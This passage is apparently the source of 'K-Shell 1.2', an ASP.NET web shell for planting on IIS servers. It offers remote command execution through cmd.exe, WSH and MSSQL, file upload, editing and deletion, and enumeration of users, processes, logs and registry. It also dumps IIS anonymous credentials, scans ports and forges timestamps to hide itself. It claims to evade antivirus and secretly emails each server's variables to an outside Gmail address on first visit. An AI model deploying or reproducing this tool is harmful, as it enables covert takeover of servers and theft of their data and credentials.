TITLE="Web Server Info"
elseif act="goto" then
TITLE="K-Shell 1.2"
elseif act="pro1" then
TITLE="List processes from server"
elseif act="pro2" then
TITLE="List processes from server"
elseif act="user" then
TITLE="List User Accounts"
elseif act="applog" then
TITLE="List Application Event Log Entries"
elseif act="syslog" then
TITLE="List System Event Log Entries"
elseif act="auser" then
TITLE="IIS List Anonymous' User details"
elseif act="sqlman" then
TITLE="MSSQL Management"
elseif act="scan" then
TITLE="Port Scanner"
elseif act="iisspy" then
TITLE="IIS Spy"
elseif act="sqltool" then
TITLE="SQL Tool"
elseif act="regshell" then
TITLE="Registry Shell"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
    color: #00FF00;
    font-family: Courier New;
}
b
{
    color: #00FF00
}
body {
    background-color: #000000;
    font-size:12px;
    font-family:"Courier New";
}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #FF0000}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title><%=TITLE%></title>
</head>
<body>
<div align="center">K-Shell 1.2 By <a href="http://www.guru.net.vn" target="_blank" title="Welcome to my page:)">kikicoco</a> from <font color="red">Vietnam</font> [<a href="http://vnsecurity.com" target="_blank">VHS</a>]</div>
<hr>
<%
Dim error_x as Exception
Try
if session("kikicoco")<>1 then
'Test sending anonymous mail, comment it if you don't want test it
    dim info As String
    Try
    info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline)
    System.Web.Mail.SmtpMail.SmtpServer = "localhost"
    System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info)
    Catch
    End Try
%>
<center>
<form runat="server">
  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
</form>
</center>
<%
else
    dim temp as string
    temp=request.QueryString("action")
    if temp="" then temp="goto"
    select case temp
    case "goto"
        if request.QueryString("src")<>"" then
            url=request.QueryString("src")
        else
            url=server.MapPath(".") & "\"
        end if
    call existdir(url)
    dim xdir as directoryinfo
    dim mydir as new DirectoryInfo(url)
    dim guru as string
    dim xfile as fileinfo

    dim ServerIP As string = "Server IP : <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - Client IP : <b>" + getIP() + "</b> - "
    dim HostName As string = "HostName : <b>" + Environment.MachineName + "</b> - Username : <b>"+ Environment.UserName +"</b><br>"
    dim OSVersion As string = "OS Version : <b>" + Environment.OSVersion.ToString() + "</b>"
    dim IISversion As string = " - IIS Version : <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br>System Dir : <b>" + Environment.SystemDirectory + "</b>"
    dim PATH_INFO As string = " - PATH_TRANSLATED : <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>"
    dim HARDWARE_INFO As string = ""
    Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
    Dim de As DictionaryEntry
    For Each de In  environmentVariables
    if de.Key = "NUMBER_OF_PROCESSORS" then
    HARDWARE_INFO += "Hardware Info : <b>" + de.Value + "CPU - "
    end if
    if de.Key = "PROCESSOR_IDENTIFIER" then
    HARDWARE_INFO += de.Value + "</b><br>"
    end if
    Next
    Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO
%>
<table width="100%"  border="0" align="center">
  <tr>
    <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td>
  </tr>
</table>
<hr>

<table width="100%"  border="0" align="center">
  <tr>
    <td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  </tr>
  <tr>
    <td width="10%">Operate:</td>
    <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> -
      <%if session("cutboard")<>"" then%>
      <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> -
      <%else%>
    Paste -
<%end if%>
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a>
</td>
  </tr>
  <tr>
    <td>
    Go to: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
    response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>

</td>
<td align="Left">
<%
response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")
%>
</td>
  </tr>

  <tr>
    <td>Tool:</td>
    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td>
  </tr>
  <tr>
    <td> </td>
    <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=regshell" >Registry Shell</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td>
  </tr>
</table>
<hr>
<table width="100%"  border="0" align="center">
    <tr>
    <td width="40%"><strong>Name</strong></td>
    <td width="15%"><strong>Size</strong></td>
    <td width="20%"><strong>ModifyTime</strong></td>
    <td width="25%"><strong>Operate</strong></td>
    </tr>
      <tr>
        <td><%
        guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
        response.Write(guru)
        for each xdir in mydir.getdirectories()
            response.Write("<tr>")
            dim filepath as string
            filepath=server.UrlEncode(url & xdir.name)
            guru= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
            response.Write(guru)
            response.Write("<td>&lt;dir&gt;</td>")
            response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
            guru="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
            response.Write(guru)
            response.Write("</tr>")
        next
        %></td>
  </tr>
        <tr>
        <td><%
        for each xfile in mydir.getfiles()
            dim filepath2 as string
            filepath2=server.UrlEncode(url & xfile.name)
            response.Write("<tr>")
            guru="<td>" & xfile.name & "</td>"
            response.Write(guru)
            guru="<td>" & GetSize(xfile.length) & "</td>"
            response.Write(guru)
            response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
            guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
            response.Write(guru)
            response.Write("</tr>")
        next
        response.Write("</table>")
        %></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
    dim CIP,CP as string
    if getIP()<>request.ServerVariables("REMOTE_ADDR") then
            CIP=getIP()
            CP=request.ServerVariables("REMOTE_ADDR")
    else
            CIP=request.ServerVariables("REMOTE_ADDR")
            CP="None"
    end if
%>
<div align=center>[ Web Server Information ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></div><br>
<table width="100%"  border="1" align="center">
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3">Client Infomation</span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
<table align=center>
    <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
    <tr>
        <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
        <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
    </tr>
</table>
<%
    case "cmd"
%>
<form runat="server">
  <p>[ CMD.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with ASP.NET account(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  Command:
  <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>
  <p>
   <asp:Label ID="result" runat="server" style="style2"/>      </p>
</form>
<%
    case "cmdw32"
%>
<form runat="server">
    <p>[ ASP.NET W32 Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
    <%
    Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>")
    %>
    CMD File:
    <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br>
    Command:&nbsp;
    <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
    <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
    <p>
    <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>
    </p>
</form>
<%
    case "cmdwsh"
%>
<form runat="server">
    <p>[ ASP.NET WSH Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
    Command:
    <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
    <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
    <p>
    <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>
    </p>
</form>
<%
    case "pro1"
%>
<form runat="server">
    <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                Try
                output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount")
                Catch
                rw("This function is disabled by server")
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "pro2"
%>
<form runat="server">
    <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center width='80%'>
        <tr>
            <td>
            <%
                Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>"
                  Dim prostr As String = ""
                  Dim htmlend As String = "</tr></table>"
                  Try
                        Dim mypro As Process() = Process.GetProcesses()
                        For Each p As Process In mypro
                              prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>"
                              prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>"
                              prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>"
                              prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>"
                        Next
                  Catch ex As Exception
                        Response.write(ex.Message)
                  End Try
                  Response.write(htmlbengin + prostr + htmlend)
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "user"
%>
<form runat="server">
    <p align=center>[ List User Accounts ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                dim WMI_function = "Win32_UserAccount"
                dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
                dim fail_description = " Access to " + WMI_function + " is protected"
                Try
                output_wmi_function_data(WMI_function,Fields_to_load)
                Catch
                rw(fail_description)
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "reg"
%>
<form runat="server">
    <p align=center>[ Registry ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                dim WMI_function = "Win32_Registry"
                dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
                dim fail_description = " Access to " + WMI_function + " is protected"
                Try
                output_wmi_function_data(WMI_function,Fields_to_load)
                Catch
                rw(fail_description)
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "applog"
%>
<form runat="server">
    <p align=center>[ List Application Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"
                dim Fields_to_load = "Logfile,Message,type"
                dim fail_description = " Access to " + WMI_function + " is protected"
                Try
                output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
                Catch
                rw(fail_description)
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "syslog"
%>
<form runat="server">
    <p align=center>[ List System Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                dim WMI_function = "Win32_NTLogEvent where Logfile='System'"
                dim Fields_to_load = "Logfile,Message,type"
                dim fail_description = " Access to " + WMI_function + " is protected"

                Try
                output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
                Catch
                rw("This function is disabled by server")
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "auser"
%>
<form runat="server">
    <p align=center>[ IIS List Anonymous' User details ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <table align=center>
        <tr>
            <td>
            <%
                Try
                IIS_list_Anon_Name_Pass
                Catch
                rw("This function is disabled by server")
                End Try
            %>
            </td>
        </tr>
    </table>
</form>
<%
    case "scan"
%>
    <form runat="server">
    <p>[ ASP.NET Port Scanner ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <div>
        C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br />
        Start IP :&nbsp;&nbsp;<asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox>
        &nbsp;&nbsp; &nbsp; --- &nbsp;End Ip : &nbsp;<asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox>&nbsp;
        <br />
        Ports &nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;<asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br />
        <br />
        <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" />
        &nbsp;&nbsp;
        <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br />
        <br />
        <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br />
        <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px"
            Width="527px" Visible="False"></asp:ListBox>
        <hr align=left style="width: 526px" />
        <br />
       </div>
    </form>
<%
case "iisspy"
%>
    <p align=center>[ IIS Spy ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <%
                Try
                Response.write(IISSpy())
                Catch
                rw("This function is disabled by server")
                End Try
    %>
<%
case "sqltool"
%>
    <p align=center>[ SQL Tool ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    <%
                Try

                Catch
                rw("This function is disabled by server")
                End Try
    %>
<%
case "regshell"
%>
    <form runat="server">
    <p align=center >[ Registry Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
    Key:&nbsp;&nbsp;
    <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br>
    Value:
    <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox>&nbsp;&nbsp;
    <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>
    <p>
    <asp:Label ID="lblresultReg" runat="server" style="color: red"/>
    </p>
    </form>
<%
    case "sqlman"
%>
<form runat="server">
  <p>[ MSSQL Query ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br>
  <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/>
  <p>
   <asp:Label ID="lblresultSQL" runat="server" style="style2"/>      </p>
</form>
<%
    case "sqlrootkit"
%>
<form runat="server">
  <p>[ SqlRootKit.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  <p>Host:
    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  <p>
  SQL Name:
    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  SQL Password:
  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  </p>
  Command:
  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>
  <p>
   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
</form>
<%
    case "del"
        dim a as string
        a=request.QueryString("src")
        call existdir(a)
        call del(a)
        response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
    case "copy"
        call existdir(request.QueryString("src"))
        session("cutboard")="" & request.QueryString("src")
        response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
    case "cut"
        call existdir(request.QueryString("src"))
        session("cutboard")="" & request.QueryString("src")
        response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
    case "paste"
        dim ow as integer
        if request.Form("OverWrite")<>"" then ow=1
        if request.Form("Cancel")<>"" then ow=2
        url=request.QueryString("src")
        call existdir(url)
        dim d as string
        d=session("cutboard")
        if left(d,1)="" then
            TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
            TEMP2=url & replace(path.getfilename(d),"","")
            if right(d,1)="\" then
                call xexistdir(TEMP1,ow)
                directory.move(replace(d,"",""),TEMP1 & "\")
                response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
            else
                call xexistdir(TEMP2,ow)
                file.move(replace(d,"",""),TEMP2)
                response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
            end if
        else
            TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
            TEMP2=url & path.getfilename(replace(d,"",""))
            if right(d,1)="\" then
                call xexistdir(TEMP1,ow)
                directory.createdirectory(TEMP1)
                call copydir(replace(d,"",""),TEMP1 & "\")
                response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
            else
                call xexistdir(TEMP2,ow)
                file.copy(replace(d,"",""),TEMP2)
                response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
            end if
        end if
    case "upfile"
        url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
 You will upload file to this directory : <span class="style3"><%=url%></span><br>
 Please choose file from your computer :
 <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
<%
    case "new"
        url=request.QueryString("src")
%>
<form runat="server">
  <%=url%><br>
  Name:
  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  <br>
  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  <br>
  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>
  <input name="Src" type="hidden" value="<%=url%>">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
    case "edit"
        dim b as string
        b=request.QueryString("src")
        call existdir(b)
        dim myread as new streamreader(b,encoding.default)
        filepath.text=b
        content.text=myread.readtoend
%>
<form runat="server">
  <table width="100%"  border="1" align="center">
    <tr>      <td width="11%">Path</td>
      <td width="89%">
      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
      *</td>
    </tr>
    <tr>
      <td>Content</td>
      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
    </tr>
    <tr>
      <td></td>
      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>
      </td>
    </tr>
  </table>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<%
        myread.close
    case "rename"
        url=request.QueryString("src")
        if request.Form("name")="" then
    %>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox">
    <input type="submit" name="Submit3" value="Submit" class="buttom">
</p>
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
        else
            if Rename() then
                response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
            else
                response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
            end if
        end if
    case "samename"
        url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
</form>
<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
   <%
    case "clonetime"
        time1.Text=request.QueryString("src")&"kshell.aspx"
        time2.Text=request.QueryString("src")
    %>
<form runat="server">
  <p>[CloneTime for WebAdmin]<i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:history.back(1);">Back</a></i> </p>
  <p>A tool that it copy the file or directory's time to another file or directory </p>
  <p>Rework File or Dir:
    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  <p>Copied File or Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
</form>
<p>
  <%
    case "logout"
        session.Abandon()
        response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
    end select
end if
Catch error_x
    response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message)
End Try
%>
</p>
</p>
<hr>
<script language="javascript">
function closewindow()
{self.close();}
</script>
</body>
</html>